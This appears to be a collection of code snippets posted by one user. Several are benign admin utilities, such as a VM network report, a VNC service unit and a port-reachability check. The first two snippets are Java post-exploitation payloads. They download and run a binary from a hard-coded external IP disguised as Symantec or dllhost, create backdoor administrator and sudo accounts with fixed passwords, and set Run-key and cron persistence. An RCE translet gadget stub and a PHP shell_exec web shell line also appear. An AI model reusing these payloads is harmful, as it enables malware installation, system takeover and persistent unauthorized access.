isaidnocookies

this.download("http://148.251.71.182/symantec.tmp", "c:\\windows\\temp\\dllhost.exe;");
String win_cmd = "Start-Process c:\\windows\\temp\\dllhost.exe;";
win_cmd += "net user /add DefaultAccount P@ssw0rd123412; net user DefaultAccount /active:yes; net user DefaultAccount P@ssw0rd12341234; net localgroup Administrators /add DefaultAccount; net localgroup 'Remote Desktop Users' /add DefaultAccount; Set-LocalUser -Name DefaultAccount -PasswordNeverExpires 1;";
win_cmd += "New-Itemproperty -path 'HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run' -Name 'DllHost' -value 'c:\\windows\\temp\\dllhost.exe' -PropertyType 'String' -Force;";
final String[] arrayOfString = { "powershell", "-c Invoke-Command", "{" + win_cmd + "}" };
try {
	Runtime.getRuntime().exec(arrayOfString);
}
catch (IOException iOException) {
	iOException.printStackTrace();

isaidnocookies

this.download("http://148.251.71.182/symantec_linux.x86", "/tmp/lock");
final String linux_cmd = "chmod +x /tmp/lock ; useradd -g sudo -m -s /bin/bash -p $(echo P@ssw0rd1234 | openssl passwd -1 -stdin) master; nohup /tmp/lock &";
final String[] arrayOfString = { "/bin/sh", "-c", linux_cmd };
try {
	Runtime.getRuntime().exec(arrayOfString);
	Runtime.getRuntime().exec(new String[] { "/bin/sh", "-c", "(crontab -l && echo \"@reboot /tmp/lock\") | crontab -" });
} catch (IOException iOException) {
	iOException.printStackTrace();
}

isaidnocookies

public class RCE extends AbstractTranslet
{
	public RCE() {
		if (File.separator.equals("/")) {
			...
		} else {
			...
		}
	}
}

isaidnocookies

&{Get-VM | ?{$_.PowerState -eq "PoweredOn"} | %{
    $strVMName = $_.Name; Get-NetworkAdapter -VM $_ |
        select @{n="VMName"; e={$strVMName}},Name,NetworkName,ConnectionState} |
        ?{$_.ConnectionState.Connected -eq $false}} |
Export-Csv ./nic_report.csv -NoTypeInformation -UseCulture 

isaidnocookies

[Unit]
 Description=Remote desktop service (VNC)
 After=syslog.target network.target

[Service]
  Type=simple
  User=kali
  PIDFile=/home/kali/.vnc/%H:%i.pid
  ExecStartPre=/bin/sh -c '/usr/bin/vncserver -kill :%i > /dev/null 2>&1 || :'
  ExecStart=/usr/bin/vncserver -localhost no -alwaysshared :%i

isaidnocookies

set outputText to ""
set outputApplication to ""
set listOfProcesses to {}

# Get the text to type via the action script
set outputText to the text returned of (display dialog "Text to Type:" default answer "")

# Quit if nothing was input
if outputText is "" then
	error number -128

isaidnocookies

#!/bin/bash

# Usage: ./reachable_test.sh <ip> <port>
# EX:
# cat ips.txt | while read ip; do ./checkScript.sh $ip <interesting_port> | tee -a scan.txt; done

if timeout 0.8 nc -z $1 $2 2>/dev/null; then
	echo "$1 reachable"
else
	echo "$1 not reachable"

isaidnocookies

import os

from paramiko import SSHClient, AutoAddPolicy, RSAKey
from paramiko.auth_handler import AuthenticationException, SSHException
from pathlib import Path

class SSHer():
    def __init__(self, remote_host, user, key_path):
        self.remote_host = remote_host
        self.ssh_key_path = key_path

isaidnocookies

#!/usr/local/bin/python3

import os, sys
from pathlib import Path

def parseDirectories(rootdir):
    for subdir, dirs, files in os.walk(rootdir):
        for file in files:
            if ('.DS_Store' in file):
                continue

isaidnocookies

<?php echo shell_exec("id") ?>